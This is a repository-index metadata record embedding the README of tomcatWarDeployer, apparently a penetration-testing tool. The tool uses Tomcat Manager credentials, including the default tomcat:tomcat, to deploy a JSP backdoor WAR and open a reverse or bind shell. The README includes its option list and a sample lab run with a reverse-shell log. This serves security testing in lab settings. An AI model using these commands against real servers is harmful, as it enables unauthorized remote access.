{"id":13539399,"url":"https://github.com/mgeeky/tomcatwardeployer","last_synced_at":"2025-04-04T21:10:09.552Z","repository":{"id":8983511,"uuid":"60195401","full_name":"mgeeky/tomcatWarDeployer","owner":"mgeeky","description":"Apache Tomcat auto WAR deployment \u0026 pwning penetration testing tool.","archived":false,"fork":false,"pushed_at":"2024-03-31T16:43:38.000Z","size":231,"stargazers_count":425,"open_issues_count":5,"forks_count":130,"subscribers_count":16,"default_branch":"master","last_synced_at":"2025-03-28T20:09:17.873Z","etag":null,"topics":["backdoor","hacking","penetration","testing","tomcat"],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mgeeky.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2016-06-01T16:57:48.000Z","updated_at":"2025-03-18T14:49:41.000Z","dependencies_parsed_at":"2024-10-25T05:26:57.684Z","dependency_job_id":"68c11777-9a96-4143-a466-19e9831c3dc4","html_url":"https://github.com/mgeeky/tomcatWarDeployer","commit_stats":null,"previous_names":[],"tags_count":3,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mgeeky%2FtomcatWarDeployer","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mgeeky%2FtomcatWarDeployer/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mgeeky%2FtomcatWarDeployer/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mgeeky%2FtomcatWarDeployer/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mgeeky","download_url":"https://codeload.github.com/mgeeky/tomcatWarDeployer/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247249532,"owners_count":20908212,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["backdoor","hacking","penetration","testing","tomcat"],"created_at":"2024-08-01T09:01:25.078Z","updated_at":"2025-04-04T21:10:09.531Z","avatar_url":"https://github.com/mgeeky.png","language":"Python","funding_links":["https://github.com/sponsors/mgeeky"],"categories":["\u003ca id=\"1233584261c0cd5224b6e90a98cc9a94\"\u003e\u003c/a\u003e渗透\u0026\u0026offensive\u0026\u0026渗透框架\u0026\u0026后渗透框架","\u003ca id=\"5dd93fbc2f2ebc8d98672b2d95782af3\"\u003e\u003c/a\u003e工具"],"sub_categories":["\u003ca id=\"2e40f2f1df5d7f93a7de47bf49c24a0e\"\u003e\u003c/a\u003e未分类-Pentest"],"readme":"## tomcatWarDeployer\nApache Tomcat auto WAR deployment \u0026amp; pwning penetration testing tool.\n\n### What is it?\nThis is a penetration testing tool intended to leverage Apache Tomcat credentials in order to automatically generate and deploy JSP Backdoor, as well as invoke it afterwards and provide nice shell (either via web gui, listening port binded on remote machine or as a reverse tcp payload connecting back to the adversary). \n\nIn practice, it generates JSP backdoor WAR package on-the-fly and deploys it at the Apache Tomcat Manager Application, using valid HTTP Authentication credentials that pentester provided (or custom ones, in the end, we all love *tomcat:tomcat* ). \n\nThe tool offers couple of handy features - like manager's panel lookup logic, support for CVE-2007-1860 double encoding issue, CSRF handling in newer Tomcat's.\n\n### Usage\nAs simple as providing server's address with port, as a IP:PORT pair. \nHere goes the help:\n\n```\nuser$ python tomcatWarDeployer.py --help\n\n    tomcatWarDeployer (v. 0.5)\n    Apache Tomcat auto WAR deployment \u0026 launching tool\n    Mariusz Banach / MGeeky '16\n\nPenetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.\n    \nUsage: tomcatWarDeployer.py [options] server\n\n  server    Specifies server address. Please also include port after colon.\n\nOptions:\n  -h, --help            show this help message and exit\n\n  General options:\n    -v, --verbose       Verbose mode.\n    -s, --simulate      Simulate breach only, do not perform any offensive\n                        actions.\n    -G OUTFILE, --generate=OUTFILE\n                        Generate JSP backdoor only and put it into specified\n                        outfile path then exit. Do not perform any\n                        connections, scannings, deployment and so on.\n    -U USER, --user=USER\n                        Tomcat Manager Web Application HTTP Auth username.\n                        Default=\"tomcat\"\n    -P PASS, --pass=PASS\n                        Tomcat Manager Web Application HTTP Auth password.\n                        Default=\"tomcat\"\n\n  Connection options:\n    -H RHOST, --host=RHOST\n                        Remote host for reverse tcp payload connection. When\n                        specified, RPORT must be specified too. Otherwise,\n                        bind tcp payload will be deployed listening on 0.0.0.0\n    -p PORT, --port=PORT\n                        Remote port for the reverse tcp payload when used with\n                        RHOST or Local port if no RHOST specified thus acting\n                        as a Bind shell endpoint.\n    -u URL, --url=URL   Apache Tomcat management console URL. Default:\n                        /manager/\n    -t TIMEOUT, --timeout=TIMEOUT\n                        Speciifed timeout parameter for socket object and\n                        other timing holdups. Default: 10\n\n  Payload options:\n    -R APPNAME, --remove=APPNAME\n                        Remove deployed app with specified name. Can be used\n                        for post-assessment cleaning\n    -X PASSWORD, --shellpass=PASSWORD\n                        Specifies authentication password for uploaded shell,\n                        to prevent unauthenticated usage. Default: randomly\n                        generated. Specify \"None\" to leave the shell\n                        unauthenticated.\n    -T TITLE, --title=TITLE\n                        Specifies head\u003etitle for uploaded JSP WAR payload.\n                        Default: \"JSP Application\"\n    -n APPNAME, --name=APPNAME\n                        Specifies JSP application name. Default: \"jsp_app\"\n    -x, --unload        Unload existing JSP Application with the same name.\n                        Default: no.\n    -C, --noconnect     Do not connect to the spawned shell immediately. By\n                        default this program will connect to the spawned\n                        shell, specifying this option let's you use other\n                        handlers like Metasploit, NetCat and so on.\n    -f WARFILE, --file=WARFILE\n                        Custom WAR file to deploy. By default the script will\n                        generate own WAR file on-the-fly.\n```\n\n\nAnd sample usage on [Kevgir 1 VM by canyoupwn.me](https://www.vulnhub.com/entry/kevgir-1,137/) running at 192.168.56.100:8080 :\n\n\n```\nuser$ python tomcatWarDeployer.py -v -x -p 4449 -H 192.168.56.102 192.168.56.100:8080\n\n    tomcatWarDeployer (v. 0.3)\n    Apache Tomcat 6/7 auto WAR deployment \u0026 launching tool\n    Mariusz Banach / MGeeky '16\n\nPenetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.\n    \nINFO: Reverse shell will connect to: 192.168.56.102:4449.\nDEBUG: Browsing to \"http://192.168.56.100:8080/manager/\"... Creds: tomcat:tomcat\nDEBUG: Apache Tomcat Manager Application reached \u0026 validated.\nDEBUG: Generating JSP WAR backdoor code...\nDEBUG: Preparing additional code for Reverse TCP shell\nDEBUG: Generating temporary structure for jsp_app WAR at: \"/tmp/tmpDhzo9I\"\nDEBUG: Working with Java at version: 1.8.0_60\nDEBUG: Generating web.xml with servlet-name: \"JSP Application\"\nDEBUG: Generating WAR file at: \"/tmp/jsp_app.war\"\nDEBUG: added manifest\nadding: files/(in = 0) (out= 0)(stored 0%)\nadding: files/WEB-INF/(in = 0) (out= 0)(stored 0%)\nadding: files/WEB-INF/web.xml(in = 547) (out= 253)(deflated 53%)\nadding: files/META-INF/(in = 0) (out= 0)(stored 0%)\nadding: files/META-INF/MANIFEST.MF(in = 68) (out= 67)(deflated 1%)\nadding: index.jsp(in = 4684) (out= 1595)(deflated 65%)\nDEBUG: WAR file structure:\nDEBUG: /tmp/tmpDhzo9I\n├── files\n│   ├── META-INF\n│   │   └── MANIFEST.MF\n│   └── WEB-INF\n│       └── web.xml\n└── index.jsp\n\n3 directories, 3 files\nWARNING: Application with name: \"jsp_app\" is already deployed.\nDEBUG: Unloading existing one...\nDEBUG: Unloading application: \"http://192.168.56.100:8080/jsp_app/\"\nDEBUG: Succeeded.\nDEBUG: Deploying application: jsp_app from file: \"/tmp/jsp_app.war\"\nDEBUG: Removing temporary WAR directory: \"/tmp/tmpDhzo9I\"\nDEBUG: Succeeded, invoking it...\nDEBUG: Spawned shell handling thread. Awaiting for the event...\nDEBUG: Awaiting for reverse-shell handler to set-up\nDEBUG: Establishing listener for incoming reverse TCP shell at 192.168.56.102:4449\nDEBUG: Socket is binded to local port now, awaiting for clients...\nDEBUG: Invoking application at url: \"http://192.168.56.100:8080/jsp_app/\"\nDEBUG: Adding 'X-Pass: oHI9mPB0mOnZ' header for shell functionality authentication.\nDEBUG: Incoming client: 192.168.56.100:54251\nINFO: JSP Backdoor up \u0026 running on http://192.168.56.100:8080/jsp_app/\nINFO: Happy pwning. Here take that password for web shell: 'oHI9mPB0mOnZ'\nDEBUG: Connected with the shell: tomcat7@canyoupwnme\njh\ntomcat7@canyoupwnme $ id\nuid=106(tomcat7) gid=114(tomcat7) groups=114(tomcat7)\n\ntomcat7@canyoupwnme $ exit\n\n```\n\nThe program will set-up a local listener for reverse-shell connection on the 192.168.56.102:4449 host (local host) as in the example above. Then, after invoking JSP Backdoor it will automatically connect with the local listener, resulting in shell being popped up. One can also skip `-H` parameter in order to go with _bind shell_ functionality, whereas rather then setting local listener - the program will go and connect with remotely listening bind-shell.\ni\nFinally, the above invocation will result in the following JSP application accessible remotely via WEB:\n\ni\n![JSP backdoor gui](screen1.png)\n\n\nAs one can see, there is password needlijked for leveraging deployed backdoor, preventing thus unauthenticated access during conducted assessment.\n\n\nSumming up, user has spawned WEB application providing WEB backdoor, authenticated via POST 'password' parameter that can be specified by user or randomly generated by the program. Then, the application upon receiving *X-Pass* header in the invocation phase, spawned reverse connection to our *netcat* handler. The HTTP header is being requested here in order to prevent user refreshing WEB gui and keep trying to bind or reverse connect. Also this makes use of authentication to reach that code.\n\nThat would be all I guess. \n\n### TESTED\n* Apache Tomcat/5.5.35\n* Apache Tomcat/6.?\n* Apache Tomcat/7.0.52\n* Apache Tomcat/7.0.56\n* Apache Tomcat/8.0.33\n\n\n### CHANGELOG\n* 19.07.16: Version 0.3: Added bind-shell \u0026 Reverse-shell functionality to provide user with direct access to the shell.\n* 12.09.16: Version 0.3.3: Added support for Tomcat 5 interface\n* 21.12.17: Quick fix for the http/https issue and avoiding SSL certificate validation.\n* 04.05.18: Enhanced a bit web interface, added colors to shell prompt and improved support for Windows shell loop.\n* 31.08.18: Added support for CSRF and JSESSIONID handling in Tomcat 7+ versions and for CVE-2007-1860 - you can check how it works automatically out-of-the-box on [PentesterLab](https://pentesterlab.com/exercises/cve-2007-1860)\n\n\n### TODO\n* ~~Implement bind \u0026 reverse tcp payload functionality as well as some pty to interact with it~~\n* ~~Finish implementing noconnect and connect functionality~~\n* Implement sort of communication authentication and encryption/encoding, to prevent flow of plain-text data through the wire/ether\n* Test it on ~~tomcat5~~, ~~tomcat8~~\n\n\n---\n\n### ☕ Show Support ☕\n\nThis and other projects are outcome of sleepless nights and **plenty of hard work**. If you like what I do and appreciate that I always give back to the community,\n[Consider buying me a coffee](https://github.com/sponsors/mgeeky) _(or better a beer)_ just to say thank you! 💪 \n\n---\n\n### Author\n\n```   \n   Mariusz Banach / mgeeky, 21\n   \u003cmb [at] binary-offensive.com\u003e\n   (https://github.com/mgeeky)\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmgeeky%2Ftomcatwardeployer","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmgeeky%2Ftomcatwardeployer","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmgeeky%2Ftomcatwardeployer/lists"}